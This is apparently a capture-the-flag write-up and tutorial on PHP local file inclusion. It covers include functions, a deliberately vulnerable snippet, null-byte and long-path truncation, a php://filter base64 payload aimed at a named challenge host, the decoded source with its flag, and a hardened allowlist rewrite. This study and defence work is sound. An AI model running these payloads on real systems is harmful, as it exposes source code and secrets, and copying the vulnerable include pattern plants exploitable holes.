1.1 Formation of File Inclusion Vulnerability


File inclusion is a typical example of code injection. PHP's include functions execute the code of the included file directly, and the extension of the included file is not restricted, so if malicious code is placed in a file that gets included, a file inclusion vulnerability results. Most file inclusion vulnerabilities can be used directly to obtain a webshell.

File inclusion in PHP is done through the following four functions:

* include() <http://www.w3school.com.cn/php/php_includes.asp>
* include_once() <http://php.net/manual/zh/function.include-once.php>
* require()
* require_once()

The difference between them is that include() and include_once() continue executing the code that follows even when an error is encountered while including the file, whereas require() and require_once() raise a fatal error and exit the program.

1.2 Local File Inclusion Vulnerability

Local file inclusion is abbreviated LFI.
The test code is as follows:

```php
<?php
// Builds an absolute path from the user-controlled "file" parameter and
// appends a fixed ".php" extension before including it.
define("ROOT", dirname(__FILE__) . '/');
$file = $_GET['file'];
echo ROOT . $file . '.php';
include(ROOT . $file . '.php');
?>
```

If you pass file=1 and 1.php contains `<?php phpinfo();?>`, the page will display the PHP version information.

1.3 File Inclusion Truncation

During file inclusion, when a fixed .php extension is appended to the filename (as in the test code above), files with other extensions cannot be included, so truncation is often required.

* Method 1:
Because PHP is implemented in C, where a string ends at a null character, \0 or %00 can be used to truncate the path.

* Method 2:

Because %00 truncation is often blocked by GPC (magic_quotes_gpc), addslashes() and the like, there is a second method: directory strings have a maximum length (256 bytes on Windows, 4096 bytes on Linux), and characters beyond that maximum are discarded, so a long run of (.) and (/) characters can be used to truncate the path.

1.4 On to the Challenge

Challenge link: <http://4.chinalover.sinaapp.com/web7/index.php>



Clicking it jumps to another page.


Here, at
http://4.chinalover.sinaapp.com/web7/index.php?file=show.php
I tried writing a payload:
http://4.chinalover.sinaapp.com/web7/index.php?file=test123.php
and
http://4.chinalover.sinaapp.com/web7/index.php?file=index.php
It doesn't work at all. Wow, this challenge really isn't so simple: there is no useful information about the source code, which makes it hard, and there's no other way to find out. The payload is as follows:

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
convert.base64-encode <http://php.net/manual/zh/filters.convert.php> base64-encodes the data stream.
I didn't understand it at all; I had never come across a filter and didn't know what it was, so I searched for it:



It turns out that this challenge tests the php://filter bypass: the index.php data stream is passed through the filter first, and the file's code is then read out base64-encoded, so the page displays a base64-encoded string, as shown in the figure below:



PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=
Decoding it with base64 reveals the web page's source code:

```php
<html>
    <title>asdf</title>

<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>
```
flag:nctf{edulcni_elif_lacol_si_siht}
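The challenge's denylist above only checks for a few substrings, which is why the php://filter payload gets through. As an added example (not the challenge's code and not from the original post), here is the same include rewritten with an allowlist and a path containment check; it assumes PHP 8 and a hypothetical pages/ directory:

```php
<?php
// Added example, not the challenge's code: a hardened replacement for
// include($_GET['file']). The challenge's substring denylist ("../", "tp",
// "input", "data") is slipped past by the php://filter payload shown above;
// an allowlist lookup plus a realpath() containment check closes that whole
// class, including the %00 and long "./" truncation tricks from section 1.3.
declare(strict_types=1);

// Hypothetical directory holding the includable pages (assumption).
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: logical page name => file on disk. Because the value comes from
// this table, neither the path nor the extension is attacker-controlled.
const PAGES = [
    'show' => 'show.php',
    'home' => 'home.php',
];

/**
 * Map an untrusted page name to an absolute path inside PAGES_DIR,
 * or return null for anything that is not explicitly allowed.
 */
function resolve_page(mixed $name): ?string
{
    // Non-string input (e.g. ?file[]=x) and unknown names are rejected outright;
    // stream wrappers and traversal sequences never survive an array lookup.
    if (!is_string($name) || !array_key_exists($name, PAGES)) {
        return null;
    }
    // Belt and braces: realpath() collapses "..", resolves symlinks and fails
    // on missing files, so confirm the result still lives under PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . DIRECTORY_SEPARATOR . PAGES[$name]);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['file'] ?? 'show');
if ($path === null) {
    // Log the rejected value for detection, then fail closed.
    error_log('rejected include parameter: ' . var_export($_GET['file'] ?? null, true));
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

With this structure the request ?file=php://filter/read=convert.base64-encode/resource=index.php from the writeup is simply an unknown key and is logged and refused, rather than being matched against a list of forbidden substrings.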